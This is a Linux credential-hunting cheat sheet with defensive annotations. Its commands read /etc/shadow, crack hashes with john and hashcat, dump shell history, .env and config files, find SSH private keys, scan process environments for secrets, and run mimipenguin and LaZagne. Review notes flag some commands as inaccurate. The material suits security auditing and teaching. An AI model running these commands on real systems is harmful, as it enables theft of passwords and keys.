
/etc/shadow

Check Readable

# /etc/shadow should not be readable by unprivileged users; if either command
# succeeds for a non-root account, the file's ownership or mode is misconfigured.
ls -la /etc/shadow
# 2>/dev/null hides the "Permission denied" error that a correctly protected file returns.
cat /etc/shadow 2>/dev/null

Crack Hashes

# Copy shadow and passwd to attacker
# unshadow merges the passwd and shadow files into the combined format john reads.
unshadow passwd shadow > unshadowed.txt
# Dictionary run with rockyou.txt, a wordlist of previously leaked passwords.
# A hash that falls to it is a password a breached-password check would have rejected.
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
# -m 1800 is the mode the table below lists for $6$ (SHA-512) hashes.
hashcat -m 1800 shadow.hash /usr/share/wordlists/rockyou.txt
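| Hash Prefix | Algorithm | Hashcat Mode |
|-------------|-----------|--------------|
| $1$         | MD5       | 500          |
| $5$         | SHA-256   | 7400         |
| $6$         | SHA-512   | 1800         |
| $y$         | yescrypt  | 28400        |

Note: verify the yescrypt row against `hashcat --help` for the installed version; in hashcat's published mode list, 28400 appears to be assigned to bcrypt(sha512($pass)) rather than yescrypt.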

History Files

# Shell and database-client history files keep past commands verbatim, so any
# password typed as a command-line argument or inline in a statement may be stored here.
# Passing secrets via a prompt, stdin or a protected file keeps them out of history.
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
cat ~/.psql_history

All Users

# Reads every file under /home whose name matches ".*history". Other users' files are
# returned only if their permissions allow it; history files should be mode 600.
find /home -name ".*history" -exec cat {} \; 2>/dev/null
# Readable only when already root or when /root is mis-permissioned; errors are discarded.
cat /root/.bash_history 2>/dev/null

Search for Passwords in History

# Case-insensitive match on common credential keywords ("pass" already covers "password").
# The same search works as a self-audit to find secrets that leaked into history.
grep -i "password\|pass\|pwd\|secret\|token" ~/.bash_history

Config Files

Web Applications

# Application config files under the web root commonly hold database credentials and
# API keys in clear text (wp-config.php is WordPress, configuration.php is Joomla).
# They should be readable only by the account the application runs as, and .env files
# should not be served by the web server.
cat /var/www/html/wp-config.php
cat /var/www/html/.env
cat /var/www/html/config.php
cat /var/www/html/configuration.php
# Lists candidate config files by extension; only names are printed, not contents.
find /var/www -name "*.conf" -o -name "*.config" -o -name "*.ini" -o -name "*.env" 2>/dev/null

Database Configs

# my.cnf may carry a clear-text password in a [client] section.
cat /etc/mysql/my.cnf
# pg_hba.conf holds client authentication rules rather than passwords; review it for
# entries using the "trust" method, which accept connections without a password.
cat /etc/postgresql/*/main/pg_hba.conf
# NOTE(review): mongod.conf presumably shows whether authorization is enabled - confirm per deployment.
cat /etc/mongod.conf

Common Config Locations

# grep -l prints only the names of *.conf files containing a keyword, not the matching lines.
# World-readable files in this output that hold real secrets need their mode tightened.
find /etc -name "*.conf" -exec grep -li "password\|pass\|pwd" {} \; 2>/dev/null
# Lists config-like files under /opt by extension; contents are not inspected.
find /opt -name "*.conf" -o -name "*.config" -o -name "*.yml" -o -name "*.yaml" 2>/dev/null

SSH Keys

Find Private Keys

# Searches the whole filesystem for files with default OpenSSH private-key names.
# A private key without a passphrase grants access wherever its public key is authorized,
# so keys should be passphrase-protected, mode 600, and never left in shared or backup paths.
find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "id_dsa" 2>/dev/null
# Directory listings show which users have keys and whether the modes are too permissive.
ls -la /home/*/.ssh/
ls -la /root/.ssh/ 2>/dev/null

Use Found Key

# The OpenSSH client refuses private key files that other users can access, hence mode 600.
chmod 600 id_rsa
# user and TARGET are placeholders. At the default log level sshd records an
# "Accepted publickey" line with the source address and key fingerprint, which lets
# defenders tie a login to a specific key.
ssh -i id_rsa user@TARGET

Authorized Keys (Persistence)

# Lists the public keys allowed to log in as each user. An entry nobody can account for
# is an indicator of persistence; monitor these files for changes.
cat /home/*/.ssh/authorized_keys 2>/dev/null

Environment Variables

# Both commands print the environment of the current shell only.
env
printenv
# /proc/<pid>/environ holds each process's initial environment, NUL-separated (tr turns
# the NULs into newlines). The kernel restricts reads to the process owner and root,
# so errors for other users' processes are expected and are discarded here.
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -i "pass\|key\|secret\|token"

Systemd Service Env Files

# Lists unit files under /etc/systemd that contain the string "Environment"
# (matches both Environment= and EnvironmentFile=). systemd's documentation states that
# environment variables are not suitable for passing secrets; LoadCredential= or a
# root-only EnvironmentFile keeps them out of world-readable unit files.
find /etc/systemd -name "*.service" -exec grep -l "Environment" {} \;

Wildcard Search for Passwords

# Recursive, case-insensitive search that prints only file names (-l), one tree at a time.
# Output is noisy (documentation, locale files, PAM configs); each hit still needs review.
# The bulk file reads this generates are visible to file-access auditing.
grep -rli "password" /etc/ 2>/dev/null
grep -rli "password" /var/ 2>/dev/null
grep -rli "password" /opt/ 2>/dev/null
grep -rli "password" /home/ 2>/dev/null

Files Containing “pass”

# Restricts the search to regular files with text/config extensions and prints the names
# of those containing "pass" (case-insensitive). grep runs once per file, so this is slow
# on large filesystems.
find / -type f \( -name "*.txt" -o -name "*.conf" -o -name "*.cfg" -o -name "*.xml" -o -name "*.ini" -o -name "*.env" -o -name "*.yml" \) -exec grep -li "pass" {} \; 2>/dev/null

Credentials in Memory

/proc

# NOTE(review): /proc/<pid>/maps is a text listing of address ranges, permissions and
# backing file paths; it does not contain process memory. This command therefore only
# matches mapped file names containing "pass", not credentials held in memory.
# Access to other users' entries under /proc/<pid> is subject to the kernel's ptrace
# access checks (see kernel.yama.ptrace_scope), so errors are expected and discarded.
strings /proc/*/maps 2>/dev/null | grep -i "pass"

mimipenguin

https://github.com/huntergregal/mimipenguin

# Python and shell variants of the same tool, both run under sudo.
# NOTE(review): presumably root is needed to read other processes' memory - confirm
# against the project README. An account that can run these already has root.
sudo python3 mimipenguin.py
sudo bash mimipenguin.sh

LaZagne

https://github.com/AlessandroZ/LaZagne

# "all" runs every module. NOTE(review): the tool targets passwords stored by locally
# installed applications - confirm module coverage against the project README.
# Results depend on what the invoking user can read.
python3 laZagne.py all

Backup Files

# Lists backup-style files by suffix. Backup copies of sensitive files often keep looser
# permissions than the originals, so they belong in permission audits.
# NOTE: "grep -v proc" drops every path containing the substring "proc", not only /proc,
# so some results elsewhere on the filesystem are hidden as well.
find / -name "*.bak" -o -name "*.old" -o -name "*.backup" -o -name "*~" 2>/dev/null | grep -v proc

Databases

SQLite

# Locates SQLite database files by extension; application databases are plain files, so
# file permissions are their only access control.
find / -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" 2>/dev/null
# found.db is a placeholder for a file from the search above; .tables lists its tables.
sqlite3 found.db ".tables"
# Assumes a table named "users" exists; the real table name comes from the .tables output.
sqlite3 found.db "SELECT * FROM users;"

MySQL (If Accessible)

# -p prompts for the root password interactively.
mysql -u root -p
# Attempts a root login with no password. Success means the root account has an empty
# password or uses socket-based authentication for the current OS user; the former
# should be fixed by setting a password or switching to socket authentication.
mysql -u root